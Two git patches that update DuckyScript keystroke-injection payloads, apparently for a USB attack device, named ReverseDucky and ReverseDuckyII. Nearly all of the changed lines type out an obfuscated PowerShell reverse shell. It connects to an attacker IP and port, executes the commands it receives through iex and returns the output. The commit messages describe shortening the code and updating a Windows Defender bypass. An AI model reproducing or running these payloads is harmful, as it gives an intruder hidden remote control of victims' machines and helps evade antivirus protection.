From 2370e63c0271a5b59a55a008b6cb67784a90430f Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Thu, 30 Sep 2021 11:27:35 +0200
Subject: [PATCH 1/2] Update ReverseDucky 1.1 to Version 1.2

Shorten the code to increase the speed
---
 .../remote_access/ReverseDucky/ReverseDucky.txt | 14 ++++++--------
 1 file changed, 6 insertions(+), 8 deletions(-)

diff --git a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
index 7492c1d..169d7e9 100644
--- a/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
+++ b/payloads/library/remote_access/ReverseDucky/ReverseDucky.txt
@@ -1,9 +1,9 @@
 REM ReverseDucky
-REM Version 1.1
+REM Version 1.2
 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
 REM Author: 0iphor13
-REM Reverse shell executed in the background
+REM Reverse shell executed in the background - If blocked by Windows Defender, please contact me.
 REM Fill in Attacker IP & Port in line 18
 REM DON'T FORGET TO START LISTENER
@@ -15,14 +15,12 @@
 DELAY 250
 ENTER
 DELAY 200
-STRING $I='0.0.0.0';$P=4444;$0LVhbQ= [TyPE]('tExT'+'.enCOD'+'InG') ; $C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPCl
+STRING $I='0.0.0.0';$P=4444;$0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient($
 DELAY 200
-STRING ient($I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b, 0, $b.Length)) -n
+STRING I,$P);$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject'
 DELAY 200
-STRING e 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb=(&('ie'+'x') $d 2>&1 | .
+STRING ) -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'PS'+(&
 DELAY 200
-STRING ('Out'+'-St'+'ring') );$sb2=$sb+'PS '+(&('pw'+'d')).Path + '> ';$sbt=( $0lvHBq::ASCII).GetBytes($sb2);$S.Write($sbt,0,
-DELAY 200
-STRING $sbt.Length);$S.Flush()};$C.Close()
+STRING ('pw'+'d')).Path+'>';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close()
 DELAY 100
 ENTER

From 169aa7a4293203002a709e55ad923002a728c72d Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Fri, 29 Oct 2021 09:19:21 +0200
Subject: [PATCH 2/2] Updated ReverseDucky 2 to version 1.2

+ Shorten the code
+ Changed shell design
+ Updated Defender bypass
---
 .../ReverseDuckyII/ReverseDuckyII.txt | 22 ++++++-------------
 1 file changed, 7 insertions(+), 15 deletions(-)

diff --git a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
index e43740b..d30661b 100644
--- a/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
+++ b/payloads/library/remote_access/ReverseDuckyII/ReverseDuckyII.txt
@@ -1,5 +1,5 @@
 REM ReverseDucky2
-REM Version 1.0
+REM Version 1.1
 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
 REM Author: 0iphor13
@@ -11,24 +11,16 @@ REM DON'T FORGET TO START LISTENER
 DELAY 1500
 GUI r
 DELAY 500
-STRING powershell -NoP -NonI -W hidden -Exec Bypass
+STRING powershell -NoP -NonI -W hidden
 DELAY 250
 ENTER
 DELAY 200
-STRING $IP='0.0.0.0';$Port=4444;$client = .('N'+'ew-O'+'bject') sYSteM.neT.soCKETs.TcPCLient
-DELAY 200
-STRING ($IP,$Port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|.('%'){0};while(($i = $s
-DELAY 200
-STRING tream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (.('Ne'+'w-O'+'bject') -TypeName SystE
-DELAY 200
-STRING M.tEXt.aSCiIEnCodinG).GetString($bytes,0, $i);$sendback = (.('i'+'ex') $data 2>&1 | .('Ou
-DELAY 200
-STRING t-'+'Str'+'in'+'g') );$sendback2 = $sendback + 'PS ' + (&('p'+'wd')).Path + '> ';$sendbyt
-DELAY 200
-STRING e = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Len
-DELAY 200
-STRING gth);$stream.Flush()};$client.Close()
+STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("ATTACKER-IP",PORT);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$
+DELAY 100
+STRING s.REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oU
+DELAY 100
+STRING t-STriNG);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE()
 DELAY 100
 ENTER